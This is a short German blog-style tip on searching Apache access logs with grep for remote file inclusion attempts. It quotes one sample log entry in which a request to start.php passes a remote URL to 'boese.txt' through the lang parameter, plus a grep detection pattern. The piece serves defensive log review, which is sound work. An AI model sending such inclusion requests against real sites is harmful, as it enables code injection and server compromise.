Mit einem kleinen, aber feinen Befehl kann man seine Apache-Logs nach Remote-File-Inclusion-Attacken durchforsten und anschließend die Dateien sicher, bzw. unschädlich machen.

Leider ist es meistens dann schon zu spät, aber trotzdem sollte man wissen was genau passiert ist.

Die Logfiles Stück für Stück durchgehen wäre ein Wahnsinn, ein praktisches Hilfsmittel ist grep:

grep =http /var/log/apache2/access*

Es werden nun alle Dateien, die im Ordner /var/log/apache2 stecken und mit access anfangen, nach dem Vorkommen ‘=http’ durchsucht.

Ein Beispiel-Eintrag wäre:

217.172.188.64 - - [22/Oct/2007:10:46:17 +0200] "GET /start.php?lang=http://domain.com/boese.txt? HTTP/1.1" 200 4174 "-" "libwww-perl/5.65"

Hier hat also jemand versucht über die Variable $lang Code einzuschleusen. Würde die Variable nicht überprüft werden (wie hier beschrieben) könnte der Angreifer nun richtig zuschlagen.